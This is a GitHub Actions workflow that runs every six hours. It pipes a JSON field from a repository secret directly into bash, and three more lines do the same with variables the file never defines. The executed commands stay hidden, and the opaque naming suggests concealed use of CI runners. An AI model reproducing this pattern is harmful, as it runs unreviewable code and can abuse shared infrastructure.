name: haizhinuo7613
on:
  workflow_dispatch:
  schedule:
    - cron: '39 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: haizhinuo7613
        env:
          vi05: ${{ secrets.vi05 }}
        run: |
          echo $vi05 | jq -r .eau5535 | /bin/bash
          echo $ykkk998 | jq -r .rof21 | /bin/bash
          echo $leko012 | jq -r .vxt103 | /bin/bash
          echo $lfb750 | jq -r .ur54 | /bin/bash

